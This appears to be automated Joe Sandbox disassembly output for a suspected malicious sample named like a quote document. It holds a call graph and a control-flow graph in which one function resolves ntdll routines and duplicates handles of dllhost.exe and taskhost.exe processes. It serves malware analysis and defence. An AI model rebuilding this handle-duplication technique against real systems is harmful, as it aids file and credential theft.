409cf9 GetVersionExW 39813->39814 39815 409d0a 39813->39815 39814->39815 39815->38695 39815->38700 39816->38701 39817->38705 39818->38707 39819->38773 39821 40bba5 39820->39821 39865 40cc26 39821->39865 39824 40bd4b 39886 40cc0c 39824->39886 39829 40b2cc 27 API calls 39830 40bbef 39829->39830 39893 40ccf0 _wcsicmp 39830->39893 39832 40bbf5 39832->39824 39894 40ccb4 6 API calls 39832->39894 39834 40bc26 39835 40cf04 17 API calls 39834->39835 39836 40bc2e 39835->39836 39837 40bd43 39836->39837 39838 40b2cc 27 API calls 39836->39838 39839 40cc0c 4 API calls 39837->39839 39840 40bc40 39838->39840 39839->39824 39895 40ccf0 _wcsicmp 39840->39895 39842 40bc46 39842->39837 39843 40bc61 memset memset WideCharToMultiByte 39842->39843 39896 40103c strlen 39843->39896 39845 40bcc0 39846 40b273 27 API calls 39845->39846 39847 40bcd0 memcmp 39846->39847 39847->39837 39848 40bce2 39847->39848 39849 404423 38 API calls 39848->39849 39850 40bd10 39849->39850 39850->39837 39851 40bd3a LocalFree 39850->39851 39852 40bd1f memcpy 39850->39852 39851->39837 39852->39851 39853->38788 39854->38825 39855->38825 39856->38825 39857->38825 39858->38825 39859->38825 39860->38825 39861->38825 39862->38825 39863->38800 39864->38822 39897 4096c3 CreateFileW 39865->39897 39867 40cc34 39868 40cc3d GetFileSize 39867->39868 39876 40bbca 39867->39876 39869 40afcf 2 API calls 39868->39869 39870 40cc64 39869->39870 39898 40a2ef ReadFile 39870->39898 39872 40cc71 39899 40ab4a MultiByteToWideChar 39872->39899 39874 40cc95 CloseHandle 39875 40b04b ??3@YAXPAX 39874->39875 39875->39876 39876->39824 39877 40cf04 39876->39877 39878 40b633 free 39877->39878 39879 40cf14 39878->39879 39905 40b1ab free free 39879->39905 39881 40cf1b 39882 40cfef 39881->39882 39885 40bbdd 39881->39885 39906 40cd4b 39881->39906 39884 40cd4b 14 API calls 39882->39884 39884->39885 39885->39824 39885->39829 39887 40b633 free 39886->39887 39888 40cc15 39887->39888 39889 40aa04 free 39888->39889 39890 40cc1d 39889->39890 39947 40b1ab free free 39890->39947 39892 40b7d4 memset CreateFileW 39892->38780 39892->38781 39893->39832 39894->39834 39895->39842 39896->39845 39897->39867 39898->39872 39900 40ab93 39899->39900 39901 40ab6b 39899->39901 39900->39874 39902 40a9ce 4 API calls 39901->39902 39903 40ab74 39902->39903 39904 40ab7c MultiByteToWideChar 39903->39904 39904->39900 39905->39881 39907 40cd7b 39906->39907 39908 40aa29 6 API calls 39907->39908 39912 40cd89 39908->39912 39909 40cef5 39910 40aa04 free 39909->39910 39911 40cefd 39910->39911 39911->39881 39912->39909 39913 40aa29 6 API calls 39912->39913 39914 40ce1d 39913->39914 39915 40aa29 6 API calls 39914->39915 39916 40ce3e 39915->39916 39917 40ce6a 39916->39917 39940 40abb7 wcslen memmove 39916->39940 39918 40ce9f 39917->39918 39943 40abb7 wcslen memmove 39917->39943 39921 40a8d0 7 API calls 39918->39921 39924 40ceb5 39921->39924 39922 40ce56 39941 40aa71 wcslen 39922->39941 39923 40ce8b 39944 40aa71 wcslen 39923->39944 39928 40a8d0 7 API calls 39924->39928 39927 40ce5e 39942 40abb7 wcslen memmove 39927->39942 39931 40cecb 39928->39931 39929 40ce93 39945 40abb7 wcslen memmove 39929->39945 39946 40d00b malloc memcpy free free 39931->39946 39934 40cedd 39935 40aa04 free 39934->39935 39936 40cee5 39935->39936 39937 40aa04 free 39936->39937 39938 40ceed 39937->39938 39939 40aa04 free 39938->39939 39939->39909 39940->39922 39941->39927 39942->39917 39943->39923 39944->39929 39945->39918 39946->39934 39947->39892 39948->38840 39949->38848 39950 4426a9 39955 4324d3 39950->39955 39952 4426d2 39969 431a7b 39952->39969 39954 4426e3 39954->39954 39956 4324e3 39955->39956 39957 4324da 39955->39957 39961 4324e8 39956->39961 40037 43240a 12 API calls 39956->40037 39958 415a91 memset 39957->39958 39958->39956 39960 4324fd 39962 432513 39960->39962 39963 432508 39960->39963 39961->39952 40039 43034a memcpy 39962->40039 40038 4325ad memset 39963->40038 39966 43250e 39966->39952 39967 432548 40040 43034a memcpy 39967->40040 39970 431aa3 39969->39970 40026 431b2e 39969->40026 39970->40026 40041 43817e 39970->40041 39973 432116 40075 4325ad memset 39973->40075 39976 432122 39976->39954 39978 431ad5 39980 431b04 39978->39980 39978->40026 40046 42faf4 12 API calls 39978->40046 39979 431b15 39981 431baa 39979->39981 39982 431b7c memcmp 39979->39982 39979->40026 40047 42ff8c 39980->40047 39985 431bb0 39981->39985 39986 431bcb 39981->39986 39982->39981 40000 431b95 39982->40000 40056 4169a7 11 API calls 39985->40056 39988 431bd1 39986->39988 39989 431c45 39986->39989 40057 43034a memcpy 39988->40057 40059 4165ff 39989->40059 39992 431bdc 39992->40026 40058 430468 11 API calls 39992->40058 39995 431c65 40001 431cba 39995->40001 39995->40026 40062 42bf4c 14 API calls 39995->40062 39997 431bef 39997->39995 39997->40000 39997->40026 39998 415a91 memset 40002 431d17 39998->40002 39999 431ca1 39999->40026 40063 42bfcf memcpy 39999->40063 40000->40026 40055 4169a7 11 API calls 40000->40055 40001->39998 40003 431d27 memcpy 40002->40003 40002->40026 40011 431da8 40003->40011 40014 431e97 40003->40014 40005 431eb8 40065 4169a7 11 API calls 40005->40065 40006 431f3c 40008 431fc3 40006->40008 40009 431f45 40006->40009 40068 4397fd memset 40008->40068 40066 4172c8 memset 40009->40066 40011->40005 40011->40014 40015 431e12 memcpy 40011->40015 40011->40026 40064 430af5 16 API calls 40011->40064 40013 431fd4 40013->40026 40069 4328e4 12 API calls 40013->40069 40014->40006 40019 431f6a 40014->40019 40015->40011 40018 431feb 40070 4233ae 11 API calls 40018->40070 40019->40026 40067 4169a7 11 API calls 40019->40067 40021 431ffc 40022 43202e 40021->40022 40025 4165ff 11 API calls 40021->40025 40071 42fe8b 22 API calls 40022->40071 40025->40022 40074 42c02e memset 40026->40074 40027 432057 40027->40026 40072 431917 23 API calls 40027->40072 40029 432079 40073 430b5d 11 API calls 40029->40073 40037->39960 40038->39966 40039->39967 40040->39966 40042 438187 40041->40042 40044 431ab6 40041->40044 40076 4380f6 40042->40076 40044->39979 40044->40026 40045 43041c 12 API calls 40044->40045 40045->39978 40046->39980 40048 43817e 139 API calls 40047->40048 40049 42ff99 40048->40049 40050 42ffe3 40049->40050 40051 42ffd0 40049->40051 40054 42ff9d 40049->40054 40301 4169a7 11 API calls 40050->40301 40300 4169a7 11 API calls 40051->40300 40054->39979 40055->40026 40056->40026 40057->39992 40058->39997 40060 4165a0 11 API calls 40059->40060 40061 41660d 40060->40061 40061->39995 40062->39999 40063->40001 40064->40011 40065->40026 40066->40026 40067->40026 40068->40013 40069->40018 40070->40021 40071->40027 40072->40029 40074->39973 40075->39976 40078 43811f 40076->40078 40077 438164 40077->40044 40078->40077 40080 4300e8 3 API calls 40078->40080 40081 437e5e 40078->40081 40080->40078 40104 437d3c 40081->40104 40083 437eb3 40083->40078 40084 437ea9 40084->40083 40090 437f22 40084->40090 40119 41f432 40084->40119 40087 437f06 40166 415c56 11 API calls 40087->40166 40089 437f95 40167 415c56 11 API calls 40089->40167 40091 437f7f 40090->40091 40092 432d4e 3 API calls 40090->40092 40091->40089 40094 43802b 40091->40094 40092->40091 40095 4165ff 11 API calls 40094->40095 40096 438054 40095->40096 40130 437371 40096->40130 40099 43806b 40100 438094 40099->40100 40168 42f50e 138 API calls 40099->40168 40102 437fa3 40100->40102 40103 4300e8 3 API calls 40100->40103 40102->40083 40169 41f638 104 API calls 40102->40169 40103->40102 40105 437d69 40104->40105 40108 437d80 40104->40108 40170 437ccb 11 API calls 40105->40170 40107 437d76 40107->40084 40108->40107 40109 437da3 40108->40109 40111 437d90 40108->40111 40112 438460 134 API calls 40109->40112 40111->40107 40174 437ccb 11 API calls 40111->40174 40115 437dcb 40112->40115 40114 437de8 40173 424f26 123 API calls 40114->40173 40115->40114 40171 444283 13 API calls 40115->40171 40117 437dfc 40172 437ccb 11 API calls 40117->40172 40120 41f54d 40119->40120 40126 41f44f 40119->40126 40121 41f466 40120->40121 40204 41c635 memset memset 40120->40204 40121->40087 40121->40090 40126->40121 40128 41f50b 40126->40128 40175 41f1a5 40126->40175 40200 41c06f memcmp 40126->40200 40201 41f3b1 90 API calls 40126->40201 40202 41f398 86 API calls 40126->40202 40128->40120 40128->40121 40203 41c295 86 API calls 40128->40203 40131 41703f 11 API calls 40130->40131 40132 437399 40131->40132 40133 43739d 40132->40133 40136 4373ac 40132->40136 40290 4446ea 11 API calls 40133->40290 40135 4373a7 40135->40099 40137 416935 16 API calls 40136->40137 40138 4373ca 40137->40138 40140 438460 134 API calls 40138->40140 40144 4251c4 137 API calls 40138->40144 40148 415a91 memset 40138->40148 40151 43758f 40138->40151 40163 437584 40138->40163 40165 437d3c 135 API calls 40138->40165 40291 425433 13 API calls 40138->40291 40292 425413 17 API calls 40138->40292 40293 42533e 16 API calls 40138->40293 40294 42538f 16 API calls 40138->40294 40295 42453e 123 API calls 40138->40295 40139 4375bc 40142 415c7d 16 API calls 40139->40142 40140->40138 40143 4375d2 40142->40143 40143->40135 40145 4442e6 11 API calls 40143->40145 40144->40138 40146 4375e2 40145->40146 40146->40135 40298 444283 13 API calls 40146->40298 40148->40138 40296 42453e 123 API calls 40151->40296 40152 4375f4 40157 437620 40152->40157 40158 43760b 40152->40158 40156 43759f 40159 416935 16 API calls 40156->40159 40161 416935 16 API calls 40157->40161 40299 444283 13 API calls 40158->40299 40159->40163 40161->40135 40163->40139 40297 42453e 123 API calls 40163->40297 40164 437612 memcpy 40164->40135 40165->40138 40166->40083 40167->40102 40168->40100 40169->40083 40170->40107 40171->40117 40172->40114 40173->40107 40174->40107 40205 41bc3b 40175->40205 40178 41edad 86 API calls 40179 41f1cb 40178->40179 40180 41f1f5 memcmp 40179->40180 40181 41f20e 40179->40181 40185 41f282 40179->40185 40180->40181 40182 41f21b memcmp 40181->40182 40181->40185 40183 41f326 40182->40183 40186 41f23d 40182->40186 40184 41ee6b 86 API calls 40183->40184 40183->40185 40184->40185 40185->40126 40186->40183 40187 41f28e memcmp 40186->40187 40229 41c8df 56 API calls 40186->40229 40187->40183 40188 41f2a9 40187->40188 40188->40183 40191 41f308 40188->40191 40192 41f2d8 40188->40192 40190 41f269 40190->40183 40193 41f287 40190->40193 40194 41f27a 40190->40194 40191->40183 40230 4446ce 11 API calls 40191->40230 40195 41ee6b 86 API calls 40192->40195 40193->40187 40196 41ee6b 86 API calls 40194->40196 40197 41f2e0 40195->40197 40196->40185 40199 41b1ca memset 40197->40199 40199->40185 40200->40126 40201->40126 40202->40126 40203->40120 40204->40121 40206 41be0b 40205->40206 40208 41bc54 40205->40208 40211 41bd61 40206->40211 40239 41ae17 34 API calls 40206->40239 40208->40206 40208->40211 40216 41bc8d 40208->40216 40231 41baf0 55 API calls 40208->40231 40210 41be45 40210->40178 40210->40185 40211->40210 40240 41a25f memset 40211->40240 40213 41be04 40238 41aee4 56 API calls 40213->40238 40215 41bd42 40215->40211 40215->40213 40218 41bdd8 memset 40215->40218 40219 41bdba 40215->40219 40216->40211 40216->40215 40217 41bd18 40216->40217 40232 4151e3 40216->40232 40217->40211 40217->40215 40236 41a9da 86 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 40217->40236 40220 41bde7 memcmp 40218->40220 40228 4175ed 6 API calls 40219->40228 40220->40213 40222 41bdfd 40220->40222 40221 41bdcc 40221->40211 40221->40220 40237 41a1b0 memset 40222->40237 40228->40221 40229->40190 40230->40183 40231->40216 40241 41837f 40232->40241 40235 444706 11 API calls 40235->40217 40236->40215 40237->40213 40238->40206 40239->40211 40240->40210 40242 4183c1 40241->40242 40243 4183ca 40241->40243 40288 418197 25 API calls 40242->40288 40261 4151f9 40243->40261 40262 418160 40243->40262 40246 4183e5 40246->40261 40271 41739b 40246->40271 40249 418444 CreateFileW 40251 418477 40249->40251 40250 41845f CreateFileA 40250->40251 40252 4184c2 memset 40251->40252 40253 41847e GetLastError free 40251->40253 40274 418758 40252->40274 40254 4184b5 40253->40254 40255 418497 40253->40255 40289 444706 11 API calls 40254->40289 40258 41837f 49 API calls 40255->40258 40258->40261 40261->40217 40261->40235 40263 41739b GetVersionExW 40262->40263 40264 418165 40263->40264 40266 4173e4 MultiByteToWideChar malloc MultiByteToWideChar free 40264->40266 40267 418178 40266->40267 40268 41817f 40267->40268 40269 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte free 40267->40269 40268->40246 40270 418188 free 40269->40270 40270->40246 40272 4173d6 40271->40272 40273 4173ad GetVersionExW 40271->40273 40272->40249 40272->40250 40273->40272 40275 418680 43 API calls 40274->40275 40276 418782 40275->40276 40277 418506 free 40276->40277 40278 418160 11 API calls 40276->40278 40277->40261 40279 418799 40278->40279 40279->40277 40280 41739b GetVersionExW 40279->40280 40281 4187a7 40280->40281 40282 4187da 40281->40282 40283 4187ad GetDiskFreeSpaceW 40281->40283 40285 4187ec GetDiskFreeSpaceA 40282->40285 40287 4187e8 40282->40287 40286 418800 free 40283->40286 40285->40286 40286->40277 40287->40285 40288->40243 40289->40261 40290->40135 40291->40138 40292->40138 40293->40138 40294->40138 40295->40138 40296->40156 40297->40139 40298->40152 40299->40164 40300->40054 40301->40054 40302 427533 40306 427548 40302->40306 40315 425711 40302->40315 40303 4259da 40359 416760 11 API calls 40303->40359 40305 4275cb 40339 425506 40305->40339 40306->40305 40313 429b7a 40306->40313 40307 4260dd 40360 424251 120 API calls 40307->40360 40308 4259c2 40335 425ad6 40308->40335 40353 415c56 11 API calls 40308->40353 40365 4446ce 11 API calls 40313->40365 40315->40303 40315->40308 40318 429a4d 40315->40318 40321 422aeb memset memcpy memcpy 40315->40321 40325 4260a1 40315->40325 40331 429ac1 40315->40331 40338 425a38 40315->40338 40349 4227f0 memset memcpy 40315->40349 40350 422b84 15 API calls 40315->40350 40351 422b5d memset memcpy memcpy 40315->40351 40352 422640 13 API calls 40315->40352 40354 4241fc 11 API calls 40315->40354 40355 42413a 90 API calls 40315->40355 40319 429a66 40318->40319 40320 429a9b 40318->40320 40361 415c56 11 API calls 40319->40361 40324 429a96 40320->40324 40363 416760 11 API calls 40320->40363 40321->40315 40364 424251 120 API calls 40324->40364 40358 415c56 11 API calls 40325->40358 40327 429a7a 40362 416760 11 API calls 40327->40362 40331->40303 40331->40335 40366 415c56 11 API calls 40331->40366 40338->40308 40356 422640 13 API calls 40338->40356 40357 4226e0 12 API calls 40338->40357 40340 42554d 40339->40340 40343 425554 40339->40343 40367 423b34 103 API calls 40340->40367 40368 422586 12 API calls 40343->40368 40344 425567 40345 4255ba 40344->40345 40346 42556c memset 40344->40346 40345->40315 40347 425596 40346->40347 40347->40345 40348 4255a4 memset 40347->40348 40348->40345 40349->40315 40350->40315 40351->40315 40352->40315 40353->40303 40354->40315 40355->40315 40356->40338 40357->40338 40358->40303 40359->40307 40360->40335 40361->40327 40362->40324 40363->40324 40364->40331 40365->40331 40366->40303 40367->40343 40368->40344 40369 4147f3 40372 414561 40369->40372 40371 414813 40373 41456d 40372->40373 40374 41457f GetPrivateProfileIntW 40372->40374 40377 4143f1 memset _itow WritePrivateProfileStringW 40373->40377 40374->40371 40376 41457a 40376->40371 40377->40376 40378 44def7 40379 44df07 40378->40379 40380 44df00 ??3@YAXPAX 40378->40380 40381 44df17 40379->40381 40382 44df10 ??3@YAXPAX 40379->40382 40380->40379 40383 44df27 40381->40383 40384 44df20 ??3@YAXPAX 40381->40384 40382->40381 40385 44df37 40383->40385 40386 44df30 ??3@YAXPAX 40383->40386 40384->40383 40386->40385 40387 4148b6 FindResourceW 40388 4148cf SizeofResource 40387->40388 40391 4148f9 40387->40391 40389 4148e0 LoadResource 40388->40389 40388->40391 40390 4148ee LockResource 40389->40390 40389->40391 40390->40391 40392 441b3f 40402 43a9f6 40392->40402 40394 441b61 40575 4386af memset 40394->40575 40396 44189a 40397 442bd4 40396->40397 40398 4418e2 40396->40398 40399 4418ea 40397->40399 40577 441409 memset 40397->40577 40398->40399 40576 4414a9 12 API calls 40398->40576 40403 43aa20 40402->40403 40404 43aadf 40402->40404 40403->40404 40405 43aa34 memset 40403->40405 40404->40394 40406 43aa56 40405->40406 40407 43aa4d 40405->40407 40578 43a6e7 40406->40578 40586 42c02e memset 40407->40586 40412 43aad3 40588 4169a7 11 API calls 40412->40588 40413 43aaae 40413->40404 40413->40412 40428 43aae5 40413->40428 40415 43ac18 40417 43ac47 40415->40417 40590 42bbd5 memcpy memcpy memcpy memset memcpy 40415->40590 40418 43aca8 40417->40418 40591 438eed 16 API calls 40417->40591 40422 43acd5 40418->40422 40593 4233ae 11 API calls 40418->40593 40421 43ac87 40592 4233c5 16 API calls 40421->40592 40594 423426 11 API calls 40422->40594 40426 43ace1 40595 439811 163 API calls 40426->40595 40427 43a9f6 161 API calls 40427->40428 40428->40404 40428->40415 40428->40427 40589 439bbb 22 API calls 40428->40589 40430 43acfd 40436 43ad2c 40430->40436 40596 438eed 16 API calls 40430->40596 40432 43ad19 40597 4233c5 16 API calls 40432->40597 40434 43ad58 40598 44081d 163 API calls 40434->40598 40436->40434 40438 43add9 40436->40438 40438->40438 40602 423426 11 API calls 40438->40602 40439 43ae3a memset 40440 43ae73 40439->40440 40603 42e1c0 147 API calls 40440->40603 40441 43adab 40600 438c4e 163 API calls 40441->40600 40443 43ad6c 40443->40404 40443->40441 40599 42370b memset memcpy memset 40443->40599 40445 43ae96 40604 42e1c0 147 API calls 40445->40604 40447 43adcc 40601 440f84 12 API calls 40447->40601 40450 43aea8 40451 43aec1 40450->40451 40605 42e199 147 API calls 40450->40605 40453 43af00 40451->40453 40606 42e1c0 147 API calls 40451->40606 40453->40404 40456 43af1a 40453->40456 40457 43b3d9 40453->40457 40607 438eed 16 API calls 40456->40607 40462 43b3f6 40457->40462 40469 43b4c8 40457->40469 40459 43b60f 40459->40404 40666 4393a5 17 API calls 40459->40666 40460 43af2f 40608 4233c5 16 API calls 40460->40608 40648 432878 12 API calls 40462->40648 40464 43af51 40609 423426 11 API calls 40464->40609 40467 43af7d 40610 423426 11 API calls 40467->40610 40468 43b4f2 40655 43a76c 21 API calls 40468->40655 40469->40468 40654 42bbd5 memcpy memcpy memcpy memset memcpy 40469->40654 40473 43b529 40656 44081d 163 API calls 40473->40656 40474 43b428 40502 43b462 40474->40502 40649 432b60 16 API calls 40474->40649 40475 43af94 40611 423330 11 API calls 40475->40611 40479 43b47e 40482 43b497 40479->40482 40651 42374a memcpy memset memcpy memcpy memcpy 40479->40651 40480 43b544 40490 43b55c 40480->40490 40657 42c02e memset 40480->40657 40481 43afca 40612 423330 11 API calls 40481->40612 40652 4233ae 11 API calls 40482->40652 40487 43afdb 40613 4233ae 11 API calls 40487->40613 40489 43b4b1 40653 423399 11 API calls 40489->40653 40658 43a87a 163 API calls 40490->40658 40492 43b56c 40495 43b58a 40492->40495 40659 423330 11 API calls 40492->40659 40494 43afee 40614 44081d 163 API calls 40494->40614 40660 440f84 12 API calls 40495->40660 40497 43b4c1 40662 42db80 163 API calls 40497->40662 40501 43b592 40661 43a82f 16 API calls 40501->40661 40650 423330 11 API calls 40502->40650 40505 43b5b4 40663 438c4e 163 API calls 40505->40663 40507 43b5cf 40664 42c02e memset 40507->40664 40509 43b005 40509->40404 40514 43b01f 40509->40514 40615 42d836 163 API calls 40509->40615 40510 43b1ef 40625 4233c5 16 API calls 40510->40625 40512 43b212 40626 423330 11 API calls 40512->40626 40514->40510 40623 423330 11 API calls 40514->40623 40624 42d71d 163 API calls 40514->40624 40516 43add4 40516->40459 40665 438f86 16 API calls 40516->40665 40519 43b087 40616 4233ae 11 API calls 40519->40616 40520 43b22a 40627 42ccb5 11 API calls 40520->40627 40523 43b10f 40619 423330 11 API calls 40523->40619 40524 43b23f 40628 4233ae 11 API calls 40524->40628 40526 43b257 40629 4233ae 11 API calls 40526->40629 40530 43b129 40620 4233ae 11 API calls 40530->40620 40531 43b26e 40630 4233ae 11 API calls 40531->40630 40533 43b09a 40533->40523 40617 42cc15 19 API calls 40533->40617 40618 4233ae 11 API calls 40533->40618 40535 43b282 40631 43a87a 163 API calls 40535->40631 40537 43b13c 40621 440f84 12 API calls 40537->40621 40539 43b29d 40632 423330 11 API calls 40539->40632 40542 43b15f 40622 4233ae 11 API calls 40542->40622 40543 43b2af 40545 43b2b8 40543->40545 40546 43b2ce 40543->40546 40633 4233ae 11 API calls 40545->40633 40634 440f84 12 API calls 40546->40634 40549 43b2c9 40636 4233ae 11 API calls 40549->40636 40550 43b2da 40635 42370b memset memcpy memset 40550->40635 40553 43b2f9 40637 423330 11 API calls 40553->40637 40555 43b30b 40638 423330 11 API calls 40555->40638 40557 43b325 40639 423399 11 API calls 40557->40639 40559 43b332 40640 4233ae 11 API calls 40559->40640 40561 43b354 40641 423399 11 API calls 40561->40641 40563 43b364 40642 43a82f 16 API calls 40563->40642 40565 43b370 40643 42db80 163 API calls 40565->40643 40567 43b380 40644 438c4e 163 API calls 40567->40644 40569 43b39e 40645 423399 11 API calls 40569->40645 40571 43b3ae 40646 43a76c 21 API calls 40571->40646 40573 43b3c3 40647 423399 11 API calls 40573->40647 40575->40396 40576->40399 40577->40397 40579 43a6f5 40578->40579 40585 43a765 40578->40585 40579->40585 40667 42a115 40579->40667 40583 43a73d 40584 42a115 147 API calls 40583->40584 40583->40585 40584->40585 40585->40404 40587 4397fd memset 40585->40587 40586->40406 40587->40413 40588->40404 40589->40428 40590->40417 40591->40421 40592->40418 40593->40422 40594->40426 40595->40430 40596->40432 40597->40436 40598->40443 40599->40441 40600->40447 40601->40516 40602->40439 40603->40445 40604->40450 40605->40451 40606->40451 40607->40460 40608->40464 40609->40467 40610->40475 40611->40481 40612->40487 40613->40494 40614->40509 40615->40519 40616->40533 40617->40533 40618->40533 40619->40530 40620->40537 40621->40542 40622->40514 40623->40514 40624->40514 40625->40512 40626->40520 40627->40524 40628->40526 40629->40531 40630->40535 40631->40539 40632->40543 40633->40549 40634->40550 40635->40549 40636->40553 40637->40555 40638->40557 40639->40559 40640->40561 40641->40563 40642->40565 40643->40567 40644->40569 40645->40571 40646->40573 40647->40516 40648->40474 40649->40502 40650->40479 40651->40482 40652->40489 40653->40497 40654->40468 40655->40473 40656->40480 40657->40490 40658->40492 40659->40495 40660->40501 40661->40497 40662->40505 40663->40507 40664->40516 40665->40459 40666->40404 40668 42a175 40667->40668 40670 42a122 40667->40670 40668->40585 40673 42b13b 147 API calls 40668->40673 40670->40668 40671 42a115 147 API calls 40670->40671 40674 43a174 40670->40674 40698 42a0a8 147 API calls 40670->40698 40671->40670 40673->40583 40688 43a196 40674->40688 40689 43a19e 40674->40689 40675 43a306 40675->40688 40703 4388c4 14 API calls 40675->40703 40677 42ff8c 139 API calls 40677->40689 40678 42a115 147 API calls 40678->40689 40679 415a91 memset 40679->40689 40680 43a642 40680->40688 40707 4169a7 11 API calls 40680->40707 40682 4165ff 11 API calls 40682->40689 40684 43a635 40706 42c02e memset 40684->40706 40688->40670 40689->40675 40689->40677 40689->40678 40689->40679 40689->40682 40689->40688 40699 439504 13 API calls 40689->40699 40700 4312d0 147 API calls 40689->40700 40701 42be4c memcpy memcpy memcpy memset memcpy 40689->40701 40702 43a121 11 API calls 40689->40702 40691 4169a7 11 API calls 40692 43a325 40691->40692 40692->40680 40692->40684 40692->40688 40692->40691 40693 42b5b5 memset memcpy 40692->40693 40694 42bf4c 14 API calls 40692->40694 40697 4165ff 11 API calls 40692->40697 40704 42b63e 14 API calls 40692->40704 40705 42bfcf memcpy 40692->40705 40693->40692 40694->40692 40697->40692 40698->40670 40699->40689 40700->40689 40701->40689 40702->40689 40703->40692 40704->40692 40705->40692 40706->40680 40707->40688 40708 441819 40711 430737 40708->40711 40710 441825 40712 430756 40711->40712 40724 43076d 40711->40724 40713 430774 40712->40713 40714 43075f 40712->40714 40726 43034a memcpy 40713->40726 40725 4169a7 11 API calls 40714->40725 40717 4307ce 40719 430819 memset 40717->40719 40727 415b2c 11 API calls 40717->40727 40718 43077e 40718->40717 40722 4307fa 40718->40722 40718->40724 40719->40724 40721 4307e9 40721->40719 40721->40724 40728 4169a7 11 API calls 40722->40728 40724->40710 40725->40724 40726->40718 40727->40721 40728->40724 40729 41493c EnumResourceNamesW

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040DDAD
                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                      • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                    • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                    • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                    • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                    • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                    • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                    • memset.MSVCRT ref: 0040DF5F
                                                                                                    • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                    • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                    • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                    • String ID: dllhost.exe$p+8w@F8w@B8w$taskhost.exe$taskhostex.exe
